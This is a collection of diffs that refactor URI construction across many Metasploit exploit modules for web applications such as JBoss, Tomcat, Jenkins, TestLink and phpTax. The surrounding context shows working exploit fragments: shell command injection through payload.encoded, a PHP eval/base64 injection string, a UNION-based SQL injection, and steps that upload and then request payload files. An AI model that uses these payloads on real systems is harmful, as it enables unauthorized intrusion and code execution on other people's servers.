--- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
+++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
@@ -277,14 +277,14 @@ EOT
 		if (datastore['VERB'] == "POST")
 			res = send_request_cgi(
 				{
-					'uri'    => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
+					'uri'    => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
 					'method' => datastore['VERB'],
 					'data'   => data
 				}, 5)
 		else
 			res = send_request_cgi(
 				{
-					'uri'    =>  normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + data,
+					'uri'    =>  normalize_uri(datastore['PATH'], '/HtmlAdaptor') + "?#{data}",
 					'method' => datastore['VERB'],
 				}, 30)
 		end
@@ -308,14 +308,14 @@ EOT
 		if (datastore['VERB'] == "POST")
 			res = send_request_cgi(
 				{
-					'uri'    => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
+					'uri'    => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
 					'method' => datastore['VERB'],
 					'data'   => data
 				}, 5)
 		else
 			res = send_request_cgi(
 				{
-					'uri'    => normalize_uri(datastore['PATH']) + '/HtmlAdaptor;index.jsp?' + data,
+					'uri'    => normalize_uri(datastore['PATH'], '/HtmlAdaptor;index.jsp') + "?#{data}",
 					'method' => datastore['VERB'],
 				}, 30)
 		end
@@ -378,7 +378,7 @@ EOT
 
 
 	def query_serverinfo
-		path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
+		path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo'
 		res = send_request_raw(
 			{
 				'uri'    => path,

--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@@ -176,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		if (datastore['VERB'] == "POST")
 			res = send_request_cgi({
 					'method'    => datastore['VERB'],
-					'uri'       => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
+					'uri'       => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
 					'vars_post' =>
 						{
 							'action'      => 'invokeOpByName',
@@ -189,7 +189,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		else
 			res = send_request_cgi({
 					'method'    => datastore['VERB'],
-					'uri'       => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
+					'uri'       => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
 					'vars_get' =>
 						{
 							'action'      => 'invokeOpByName',
@@ -275,7 +275,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Undeploying #{app_base} ...")
 		res = send_request_cgi({
 			'method'    => datastore['VERB'],
-			'uri'       => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
+			'uri'       => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
 			'vars_post' =>
 				{
 					'action'      => 'invokeOpByName',
@@ -314,7 +314,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def query_serverinfo
-		path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
+		path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo'
 		res = send_request_raw(
 			{
 				'uri'    => path

--- a/modules/exploits/multi/http/jenkins_script_console.rb
+++ b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def http_send_command(cmd, opts = {})
 		request_parameters = {
 			'method'    => 'POST',
-			'uri'       => "#{@uri.path}script",
+			'uri'       => normalize_uri(@uri.path, "script"),
 			'vars_post' =>
 				{
 					'script' => java_craft_runtime_exec(cmd),
@@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_status('Logging in...')
 			res = send_request_cgi({
 				'method'    => 'POST',
-				'uri'       => "#{@uri.path}j_acegi_security_check",
+				'uri'       => normalize_uri(@uri.path, "j_acegi_security_check"),
 				'vars_post' =>
 					{
 						'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),

--- a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb
+++ b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		res = send_request_raw({
 			'method' => 'GET',
-			'uri'    => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php"
+			'uri'    => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php")
 		})
 
 		if res and res.code == 200
@@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)")
 		send_request_cgi({
 			'method' => 'POST',
-			'uri'    => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php",
+			'uri'    => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php"),
 			'data'   => php
 		})
 
 		print_status("#{peer} - Requesting data.php")
 		send_request_raw({
 			'method' => 'GET',
-			'uri'    => "#{uri}admin/libraries/ajaxfilemanager/inc/data.php"
+			'uri'    => normalize_uri(uri, 'admin/libraries/ajaxfilemanager/inc/data.php')
 		})
 
 		handler

--- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb
+++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb
@@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Run payload
 		#
 		print_status("#{@peer} - Requesting '#{php_fname}'")
-		send_request_cgi({ 'uri' => normalize_uri(base, pages, php_fname) })
+		send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) })
 
 		handler
 	end

--- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb
+++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		uri << '/' if uri[-1,1] != '/'
 		base = File.dirname("#{uri}.")
 
-		res = send_request_raw({'uri'=>"#{base}/index.php"})
+		res = send_request_raw({'uri'=>normalize_uri(uri, "/index.php")})
 		if res and res.body =~ /MobileCartly/
 			return Exploit::CheckCode::Detected
 		else
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		#
 		print_status("#{@peer} - Uploading payload")
 		res = send_request_cgi({
-			'uri' => "#{base}/includes/savepage.php",
+			'uri' => normalize_uri(base, "/includes/savepage.php"),
 			'vars_get' => {
 				'savepage'    => php_fname,
 				'pagecontent' => get_write_exec_payload(:unlink_self=>true)
@@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Run payload
 		#
 		print_status("#{@peer} - Requesting '#{php_fname}'")
-		send_request_cgi({ 'uri' => "#{base}/pages/#{php_fname}" })
+		send_request_cgi({ 'uri' => normalize_uri(base, pages, php_fname) })
 
 		handler
 	end

--- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb
+++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb
@@ -98,7 +98,7 @@ class Metasploit4 < Msf::Exploit::Remote
 	end
 
 	def http_send_raw(cmd)
-		path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi'
+		path = normalize_uri(target_uri.path, '/mt-upgrade.cgi')
 		pay = cmd.gsub('\\', '\\\\').gsub('"', '\"')
 		send_request_cgi(
 			{

--- a/modules/exploits/multi/http/openfire_auth_bypass.rb
+++ b/modules/exploits/multi/http/openfire_auth_bypass.rb
@@ -89,10 +89,10 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		base = normalize_uri(target_uri.path)
+		base = target_uri.path
 		base << '/' if base[-1, 1] != '/'
 
-		path = "#{base}login.jsp"
+		path = normalize_uri(base, "login.jsp")
 		res = send_request_cgi(
 			{
 				'uri'    => path
@@ -183,7 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		data << "\r\n--#{boundary}--"
 
 		res = send_request_cgi({
-			'uri'     => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin",
+			'uri'     => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?uploadplugin"),
 			'method'  => 'POST',
 			'data'    => data,
 			'headers' =>
@@ -201,7 +201,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		if datastore['REMOVE_PLUGIN']
 			print_status("Deleting plugin #{plugin_name} from the server")
 			res = send_request_cgi({
-				'uri'     => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}",
+				'uri'     => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?deleteplugin=") + plugin_name.downcase,
 				'headers' =>
 					{
 						'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",

--- a/modules/exploits/multi/http/php_cgi_arg_injection.rb
+++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@@ -96,10 +96,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			]
 
 			qs = args.join()
-			uri = normalize_uri(target_uri)
+			uri = normalize_uri(target_uri.path)
 			uri = "#{uri}?#{qs}"
-
-			#print_status("URI: #{target_uri}?#{qs}")      # Uncomment to preview URI
 
 			# Has to be all on one line, so gsub out the comments and the newlines
 			payload_oneline = "<?php " + payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")

--- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb
+++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb
@@ -252,7 +252,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_status("Trying file: #{f}")
 			send_request_raw({
 				'method' => 'GET',
-				'uri'    => "#{base}mods/documents/uploads/#{f}",
+				'uri'    => normalize_uri(base, 'mods/documents/uploads/', f),
 				'cookie' => cookie
 			})
 		end

--- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb
+++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb
@@ -56,9 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = normalize_uri(datastore['URI'])
-		uri << '/' if uri[-1,1] != '/'
-		uri << 'index.php'
+		uri = normalize_uri(datastore['URI'], 'index.php')
 
 		res = send_request_raw(
 			{
@@ -74,9 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def get_session
-		uri normalize_uri(datastore['URI'])
-		uri << '/' if uri[-1,1] != '/'
-		uri << 'index.php'
+		uri = normalize_uri(datastore['URI'], 'index.php')
 
 		res = send_request_raw(
 			{

--- a/modules/exploits/multi/http/phptax_exec.rb
+++ b/modules/exploits/multi/http/phptax_exec.rb
@@ -73,13 +73,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def exploit
-		uri = normalize_uri(target_uri.path)
-		uri << '/' if uri[-1,1] != '/'
+		uri = target_uri.path
 
 		print_status("#{rhost}#{rport} - Sending request...")
 		res = send_request_cgi({
 			'method'   => 'GET',
-			'uri'      => "#{uri}drawimage.php",
+			'uri'      => normalize_uri(uri, "drawimage.php"),
 			'vars_get' => {
 				'pdf'    => 'make',
 				'pfilez' => "xxx; #{payload.encoded}"

--- a/modules/exploits/multi/http/plone_popen2.rb
+++ b/modules/exploits/multi/http/plone_popen2.rb
@@ -61,9 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = normalize_uri(datastore['URI'])
-		uri << '/' if uri[-1,1] != '/'
-		uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
+		uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')
 
 		res = send_request_raw(
 			{
@@ -77,9 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		uri = normalize_uri(datastore['URI'])
-		uri << '/' if uri[-1,1] != '/'
-		uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
+		uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')
 
 		send_request_cgi(
 			{

--- a/modules/exploits/multi/http/pmwiki_pagelist.rb
+++ b/modules/exploits/multi/http/pmwiki_pagelist.rb
@@ -73,8 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		header = rand_text_alpha_upper(3)
 		header_append = rand_text_alpha_upper(4)
 
-		uri = normalize_uri(datastore['URI'])
-		uri += (datastore['URI'][-1, 1] == "/") ? 'pmwiki.php' : '/pmwiki.php'
+		uri = normalize_uri(datastore['URI'], "pmwiki.php")
 
 		res = send_request_cgi({
 			'method'    => 'POST',

--- a/modules/exploits/multi/http/qdpm_upload_exec.rb
+++ b/modules/exploits/multi/http/qdpm_upload_exec.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		uri << '/' if uri[-1,1] != '/'
 		base = File.dirname("#{uri}.")
 
-		res = send_request_raw({'uri'=>"#{base}/index.php"})
+		res = send_request_raw({'uri'=>normalize_uri(base, "/index.php")})
 		if res and res.body =~ /<div id\=\"footer\"\>.+qdPM ([\d])\.([\d]).+\<\/div\>/m
 			major, minor = $1, $2
 			return Exploit::CheckCode::Vulnerable if (major+minor).to_i <= 70
@@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Login
 		res = send_request_cgi({
 			'method'    => 'POST',
-			'uri'       => "#{base}/index.php/home/login",
+			'uri'       => normalize_uri("#{base}/index.php/home/login"),
 			'vars_post' => {
 				'login[email]'    => username,
 				'login[password]' => password,
@@ -187,7 +187,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		res = send_request_cgi({
 			'method'  => 'POST',
-			'uri'     => "#{base}/index.php/home/myAccount",
+			'uri'     => normalize_uri("#{base}/index.php/home/myAccount"),
 			'ctype'   => "multipart/form-data; boundary=#{data.bound}",
 			'data'    => post_data,
 			'cookie'  => cookie,
@@ -205,7 +205,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# When we upload a file, it will be renamed. The 'myAccount' page has that info.
 		res = send_request_cgi({
-			'uri'    => "#{base}/index.php/home/myAccount",
+			'uri'    => normalize_uri("#{base}/index.php/home/myAccount"),
 			'cookie' => cookie
 		})
 

--- a/modules/exploits/multi/http/sit_file_upload.rb
+++ b/modules/exploits/multi/http/sit_file_upload.rb
@@ -64,12 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 
-		uri = normalize_uri(datastore['URI'])
-		if uri[-1,1] != '/'
-			uri = uri + "index.php"
-		else
-			uri = uri + "/index.php"
-		end
+		uri = normalize_uri(datastore['URI'], "index.php")
 
 		res = send_request_raw({
 			'uri'     => uri
@@ -91,12 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def retrieve_session(user, pass)
 
-		uri = normalize_uri(datastore['URI'])
-		if uri[-1,1] == "/"
-			uri = uri + "login.php"
-		else
-			uri = uri + "/login.php"
-		end
+		uri = normalize_uri(datastore['URI'], "login.php")
 
 		res = send_request_cgi({
 			'uri'     => uri,
@@ -121,12 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def upload_page(session, newpage, contents)
 
-		uri = normalize_uri(datastore['URI'])
-		if uri[-1,1] == "/"
-			uri = uri + "ftp_upload_file.php"
-		else
-			uri = uri + "/ftp_upload_file.php"
-		end
+		uri = normalize_uri(datastore['URI'], "ftp_upload_file.php")
 
 		boundary = rand_text_alphanumeric(6)
 
@@ -187,12 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def cmd_shell(cmdpath)
 		print_status("Calling payload: #{cmdpath}")
 
-		uri = normalize_uri(datastore['URI'])
-		if uri[-1,1] == "/"
-			uri = uri + cmdpath
-		else
-			uri = uri + "/#{cmdpath}"
-		end
+		uri = normalize_uri(datastore['URI'], cmdpath)
 
 		send_request_raw({
 			'uri'	=> uri

--- a/modules/exploits/multi/http/sonicwall_gms_upload.rb
+++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb
@@ -264,7 +264,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
 		res = send_request_cgi(
 			{
-				'uri'    => "#{@uri}appliance/#{@jsp_name}.jsp",
+				'uri'    => normalize_uri("#{@uri}appliance/#{@jsp_name}.jsp"),
 				'method' => 'GET'
 			})
 

--- a/modules/exploits/multi/http/testlink_upload_exec.rb
+++ b/modules/exploits/multi/http/testlink_upload_exec.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 
-		base  = normalize_uri(target_uri.path)
+		base  = target_uri.path
 		base << '/' if base[-1, 1] != '/'
 		peer = "#{rhost}:#{rport}"
 
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		begin
 			res = send_request_cgi({
 				'method' => 'GET',
-				'uri'    => "#{base}login.php"
+				'uri'    => normalize_uri(base, "login.php")
 			})
 
 			return Exploit::CheckCode::Unknown if res.nil?
@@ -185,7 +185,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		begin
 			res = send_request_cgi({
 				'method'  => 'GET',
-				'uri'     => "#{base}lib/attachments/attachmentupload.php?id=#{id}&tableName=#{table}",
+				'uri'     => normalize_uri(base, "lib/attachments/attachmentupload.php") + "?id=#{id}&tableName=#{table}",
 				'cookie' => datastore['COOKIE'],
 			})
 			if res and res.code == 200
@@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		begin
 			res = send_request_cgi({
 				'method' => 'GET',
-				'uri'    => "#{base}upload_area/#{table}/#{id}/"
+				'uri'    => normalize_uri(base, "upload_area", table, id)
 			})
 			if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
 				@token = $1
@@ -238,11 +238,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		# attempt to retrieve real file name from the database
 		if @token.nil?
 			print_status("#{@peer} - Retrieving real file name from the database.")
-			sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
+			sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
 			begin
 				res = send_request_cgi({
 					'method' => 'GET',
-					'uri'    => "#{base}#{sqli}",
+					'uri'    => sqli,
 					'cookie' => datastore['COOKIE'],
 				})
 				if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
@@ -263,7 +263,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		begin
 			send_request_cgi({
 				'method' => 'GET',
-				'uri'    => "#{base}upload_area/nodes_hierarchy/#{id}/#{@token}.php"
+				'uri'    => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php")
 			})
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 			print_error("#{@peer} - Connection failed")

--- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
@@ -198,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		#
 		# UPLOAD
 		#
-		path_tmp = normalize_uri(datastore['PATH']) + "/deploy" + query_str
+		path_tmp = normalize_uri(datastore['PATH'], "deploy") + query_str
 		print_status("Uploading #{war.length} bytes as #{app_base}.war ...")
 		res = send_request_cgi({
 			'uri'          => path_tmp,
@@ -247,7 +247,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		#
 		# DELETE
 		#
-		path_tmp = normalize_uri(datastore['PATH']) + "/undeploy" + query_str
+		path_tmp = normalize_uri(datastore['PATH'], "/undeploy") + query_str
 		print_status("Undeploying #{app_base} ...")
 		res = send_request_cgi({
 			'uri'          => path_tmp,
@@ -263,7 +263,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def query_serverinfo()
-		path = normalize_uri(datastore['PATH']) + '/serverinfo'
+		path = normalize_uri(datastore['PATH'], '/serverinfo')
 		res = send_request_raw(
 			{
 				'uri'   => path

--- a/modules/exploits/multi/http/traq_plugin_exec.rb
+++ b/modules/exploits/multi/http/traq_plugin_exec.rb
@@ -58,8 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = normalize_uri(datastore['URI'])
-		uri += (uri[-1, 1] == "/") ? "admincp/login.php" : "/admincp/login.php"
+		uri = normalize_uri(datastore['URI'], "admincp", "login.php")
 
 		res = send_request_raw(
 			{
@@ -75,8 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		p = Rex::Text.encode_base64(payload.encoded)
 
-		uri = normalize_uri(datastore['URI'])
-		uri += (uri[-1, 1] == "/") ? "admincp/plugins.php?newhook" : "/admincp/plugins.php?newhook"
+		uri = normalize_uri(datastore['URI'], "admincp", "plugins.php") + "?newhook"
 
 		res = send_request_cgi(
 			{
@@ -92,8 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					}
 			}, 25)
 
-		uri = normalize_uri(datastore['URI'])
-		uri += (uri[-1, 1] == "/") ? "index.php" : "/index.php"
+		uri = normalize_uri(datastore['URI'], "index.php")
 
 		res = send_request_cgi(
 			{

--- a/modules/exploits/multi/http/vbseo_proc_deutf.rb
+++ b/modules/exploits/multi/http/vbseo_proc_deutf.rb
@@ -55,9 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		flag = rand_text_alpha(rand(10)+10)
 		data = "char_repl='{${print(#{flag})}}'=>"
 
-		uri = normalize_uri(datastore['URI'])
-		uri << '/' if uri[-1,1] != '/'
-		uri << 'vbseocp.php'
+		uri = normalize_uri(datastore['URI'], 'vbseocp.php')
 
 		response = send_request_cgi({
 			'method' => "POST",
@@ -82,9 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"
 
-		uri = normalize_uri(datastore['URI'])
-		uri << '/' if uri[-1,1] != '/'
-		uri << 'vbseocp.php'
+		uri = normalize_uri(datastore['URI'], 'vbseocp.php')
 
 		response = send_request_cgi({
 			'method' => 'POST',

--- a/modules/exploits/multi/http/webpagetest_upload_exec.rb
+++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb
@@ -63,8 +63,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		uri << '/' if uri[-1,1] != '/'
 		base = File.dirname("#{uri}.")
 
-		res1 = send_request_raw({'uri'=>"#{base}/index.php"})
-		res2 = send_request_raw({'uri'=>"#{base}/work/resultimage.php"})
+		res1 = send_request_raw({'uri'=>normalize_uri("#{base}/index.php")})
+		res2 = send_request_raw({'uri'=>normalize_uri("#{base}/work/resultimage.php")})
 
 		if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and
 			res2 and res2.code == 200
@@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
 		res = send_request_cgi({
 			'method' => 'POST',
-			'uri'    => "#{base}/work/resultimage.php",
+			'uri'    => normalize_uri("#{base}/work/resultimage.php"),
 			'ctype'  => "multipart/form-data; boundary=#{data.bound}",
 			'data'   => data.to_s
 		})
@@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		@target_path = "#{base}/results/#{fname}"
+		@target_path = normalize_uri("#{base}/results/#{fname}")
 		print_status("#{peer} - Requesting #{@target_path}")
 		res = send_request_cgi({'uri'=>@target_path})
 

--- a/modules/exploits/multi/http/wikka_spam_exec.rb
+++ b/modules/exploits/multi/http/wikka_spam_exec.rb
@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def get_cookie
 		res = send_request_raw({
 			'method' => 'GET',
-			'uri'    => "#{@base}wikka.php"
+			'uri'    => normalize_uri(@base, "wikka.php")
 		})
 
 		# Get the cookie in this format:
@@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	#
 	def login(cookie)
 		# Send a request to the login page so we can obtain some hidden values needed for login
-		uri = "#{@base}wikka.php?wakka=UserSettings"
+		uri = normalize_uri(@base, "wikka.php") + "?wakka=UserSettings"
 		res = send_request_raw({
 			'method'  => 'GET',
 			'uri'     => uri,
@@ -163,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Get the necessary fields in order to post a comment
 		res = send_request_raw({
 			'method' => 'GET',
-			'uri'    => "#{@base}wikka.php?wakka=#{datastore['PAGE']}&show_comments=1",
+			'uri'    => normalize_uri(@base, "wikka.php") + "?wakka=#{datastore['PAGE']}&show_comments=1",
 			'cookie' => cookie
 		})
 
@@ -189,11 +189,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Inject payload
 		b64_payload = Rex::Text.encode_base64(payload.encoded)
 		port = (rport.to_i == 80) ? "" : ":#{rport}"
-		uri = "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment"
+		uri = normalize_uri("#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment")
 		post_data = ""
 		send_request_cgi({
 			'method'    => 'POST',
-			'uri'       => "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment",
+			'uri'       => uri,
 			'cookie'    => cookie,
 			'headers'   => { 'Referer' => "http://#{rhost}:#{port}/#{uri}" },
 			'vars_post' => fields,
@@ -202,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		send_request_raw({
 			'method' => 'GET',
-			'uri'    => "#{@base}spamlog.txt.php"
+			'uri'    => normalize_uri(@base, "spamlog.txt.php")
 		})
 	end
 

--- a/modules/exploits/unix/webapp/basilic_diff_exec.rb
+++ b/modules/exploits/unix/webapp/basilic_diff_exec.rb
@@ -61,12 +61,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		base = normalize_uri(target_uri.path)
-		base << '/' if base[-1, 1] != '/'
 
 		sig = rand_text_alpha(10)
 
 		res = send_request_cgi({
-			'uri'  => "/#{base}/Config/diff.php",
+			'uri'  => normalize_uri("/#{base}/Config/diff.php"),
 			'vars_get' => {
 				'file' => sig,
 				'new'  => '1',
@@ -86,10 +85,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Sending GET request...")
 
 		base = normalize_uri(target_uri.path)
-		base << '/' if base[-1, 1] != '/'
 
 		res = send_request_cgi({
-				'uri' => "/#{base}/Config/diff.php",
+				'uri' => normalize_uri("/#{base}/Config/diff.php"),
 				'vars_get' => {
 					'file' => "&#{payload.encoded} #",
 					'new'  => '1',

--- a/modules/exploits/unix/webapp/coppermine_piceditor.rb
+++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 		res = send_request_raw({
-			'uri' => normalize_uri(datastore['URI']) + '/picEditor.php'
+			'uri' => normalize_uri(datastore['URI'], '/picEditor.php')
 		}, 25)
 
 		if (res and res.body =~ /Coppermine Picture Editor/i)
@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		res = send_request_cgi({
 			'method'    => 'POST',
-			'uri'	      => normalize_uri(datastore['URI']) + "/picEditor.php",
+			'uri'	      => normalize_uri(datastore['URI'], "/picEditor.php"),
 			'vars_post' =>
 				{
 					'angle' => angle,

--- a/modules/exploits/unix/webapp/egallery_upload_exec.rb
+++ b/modules/exploits/unix/webapp/egallery_upload_exec.rb
@@ -58,12 +58,11 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = normalize_uri(target_uri.path)
-		uri << '/' if uri[-1,1] != '/'
+		uri = target_uri.path
 
 		res = send_request_cgi({
 			'method' => 'GET',
-			'uri'    => "#{uri}egallery/uploadify.php"
+			'uri'    => normalize_uri(uri, "egallery", "uploadify.php")
 		})
 
 		if res and res.code == 200 and res.body.empty?
@@ -97,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{peer} - Sending PHP payload (#{payload_name})")
 		res = send_request_cgi({
 			'method' => 'POST',
-			'uri'    => "#{uri}egallery/uploadify.php",
+			'uri'    => normalize_uri("#{uri}egallery/uploadify.php"),
 			'ctype'  => "multipart/form-data; boundary=#{boundary}",
 			'data'   => post_data
 		})
@@ -113,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Execute our payload
 		res = send_request_cgi({
 			'method' => 'GET',
-			'uri'    => "#{uri}#{payload_name}"
+			'uri'    => normalize_uri("#{uri}#{payload_name}")
 		})
 
 		# If we don't get a 200 when we request our malicious payload, we suspect

--- a/modules/exploits/unix/webapp/joomla_tinybrowser.rb
+++ b/modules/exploits/unix/webapp/joomla_tinybrowser.rb
@@ -54,9 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = normalize_uri(datastore['URI'])
-		uri << '/' if uri[-1,1] != '/'
-		uri << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='
+		uri = normalize_uri(datastore['URI'], 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php')
+		uri << '?type=file&folder='
 		res = send_request_raw(
 			{
 				'uri' => uri

--- a/modules/exploits/unix/webapp/openx_banner_edit.rb
+++ b/modules/exploits/unix/webapp/openx_banner_edit.rb
@@ -68,9 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = normalize_uri(datastore['URI'])
-		uri << '/' if uri[-1,1] != '/'
-		uri << 'www/admin/'
+		uri = normalize_uri(datastore['URI'], 'www', 'admin/')
 		res = send_request_raw(
 			{
 				'uri' => uri
@@ -108,9 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
